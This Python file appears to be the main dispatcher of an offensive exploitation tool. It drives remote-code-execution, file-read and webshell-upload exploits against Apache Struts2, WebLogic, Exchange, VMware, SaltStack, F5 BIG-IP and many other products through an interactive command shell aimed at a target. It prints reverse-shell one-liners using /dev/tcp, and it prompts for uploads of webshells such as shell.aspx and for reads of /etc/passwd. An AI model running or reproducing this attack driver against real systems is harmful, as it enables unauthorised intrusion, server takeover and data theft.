#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from module import globals
from module.time import now
from module.color import color
from module.allcheck import os_check, url_check, survival_check
from payload.ApacheShiro import ApacheShiro
from payload.ApacheSolr import ApacheSolr
from payload.ApacheTomcat import ApacheTomcat
from payload.Elasticsearch import Elasticsearch
from payload.Jenkins import Jenkins
from payload.Spring import Spring
from payload.OracleWeblogic import OracleWeblogic
from payload.ApacheFlink import ApacheFlink
from payload.Nexus import Nexus
from payload.RadHatJBoss import RedHatJBoss
from payload.ApacheUnomi import ApacheUnomi
from payload.ThinkPHP import ThinkPHP
from payload.Drupal import Drupal
from payload.ApacheStruts2 import ApacheStruts2
from payload.Fastjson import Fastjson
from payload.ApacheDruid import ApacheDruid
from payload.Laravel import Laravel
from payload.Vmware import Vmware
from payload.SaltStack import SaltStack
from payload.Exchange import Exchange
from payload.F5_BIG_IP import BIG_IP
from payload.ApacheOFBiz import ApacheOFBiz


explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029",
            "S2-032", "S2-045", "S2-046", "S2-048", "S2-052", "S2-057", "S2-059", "S2-061", "S2-devMode",
            "CVE-2014-3120", "CVE-2015-1427", "CVE-2016-3088", "CVE-2016-4437", "CVE-2017-12615", "CVE-2020-1938",
            "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-6340", "CVE-2018-1000861", "CVE-2019-7238", "CVE-2020-10199",
            "CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2894", "CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2555",
            "CVE-2020-2883", "CVE-2020-14882", "CVE-2010-0738", "CVE-2010-1428", "CVE-2015-7501", "CVE-2018-20062",
            "CVE-2019-9082", "CVE-2020-13942", "CVE-2020-17519", "CVE-2019-3799", "CVE-2020-5410", "cve-2017-12629",
            "cve-2019-17558", "s2-005", "s2-008", "s2-009", "s2-013", "s2-015", "s2-016", "s2-029", "s2-032",
            "s2-045", "s2-046",  "s2-048", "s2-052", "s2-057", "s2-059", "s2-061", "s2-devmode", "cve-2014-3120",
            "cve-2015-1427", "cve-2016-3088", "cve-2016-4437", "cve-2017-12615", "cve-2020-1938", "cve-2018-7600",
            "cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506",
            "cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883",
            "cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082",
            "cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "1.2.24", "1.2.47", "1.2.62",
            "CVE-2021-25646", "cve-2021-25646", "CVE-2018-15133", "cve-2018-15133", "CVE-2021-21972", "cve-2021-21972",
            "CVE-2021-25282", "cve-2021-25282", "CVE-2021-27065", "cve-2021-27065", "CVE-2021-22986", "cve-2021-22986",
            "CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295")


def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    exp_apache_druid = ApacheDruid(target)
    exp_laravel = Laravel(target)
    exp_vmware = Vmware(target)
    exp_saltstack = SaltStack(target)
    exp_exchange = Exchange(target)
    exp_big_ip = BIG_IP(target)
    exp_apache_ofbiz = ApacheOFBiz(target)
    print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target))
    print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(" input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"")
    cmd = "whoami"  # 为了消除pycharm错误提示，没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示，没啥用
    path = "/tmp/test"  # 为了消除pycharm错误提示，没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示，没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示，没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示，没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示，没啥用
    laravel_key = "null"  # 为了消除pycharm错误提示，没啥用
    laravel_gadget = 1  # 为了消除pycharm错误提示，没啥用

    if vul_num not in explists:
        print(now.timed(de=0) + color.red_warn() + color.red(
            " The vulnerability does not support exploitation. Please refer to \"--list\""))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(now.timed(de=delay) + color.green("[+] Input username: "))
            nexus_p = input(now.timed(de=delay) + color.green("[+] Input password: "))
        elif os_check() == "windows":
            nexus_u = input(now.no_color_timed(de=delay) + "[+] Input username: ")
            nexus_p = input(now.no_color_timed(de=delay) + "[+] Input password: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
    elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
        if os_check() == "linux" or os_check() == "other":
            laravel_key = input(now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
        elif os_check() == "windows":
            laravel_key = input(now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
        if os_check() == "linux" or os_check() == "other":
            laravel_gadget = input(now.timed(de=delay) + color.green("[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
        elif os_check() == "windows":
            laravel_gadget = input(now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
    elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
        if os_check() == "linux" or os_check() == "other":
            os_type = input(now.timed(de=delay) + color.green("[+] The target os type (linux/windows): "))
        elif os_check() == "windows":
            os_type = input(now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_vmware.cve_2021_21972_exp(cmd, os_type)
    elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
        if os_check() == "linux" or os_check() == "other":
            file = input(now.timed(de=delay) + color.green("[+] upload file: "))
            path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): "))
        elif os_check() == "windows":
            file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
            path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): "))
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_saltstack.cve_2021_25282_exp(cmd, file, path)
    elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
        if os_check() == "linux" or os_check() == "other":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): "))
        elif os_check() == "windows":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_exchange.cve_2021_27065_exp(cmd, file, email)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)

            elif vul_num == "CVE-2021-25646":
                print(bash_2)
                exp_apache_druid.cve_2021_25646_exp(cmd)

            elif vul_num == "CVE-2021-22986":
                exp_big_ip.cve_2021_22986_exp(cmd)
            elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
                print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
                exp_big_ip.cve_2020_5902_exp(cmd)
            elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
                print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
                exp_apache_ofbiz.cve_2021_26295_exp(cmd)
            else:
                pass
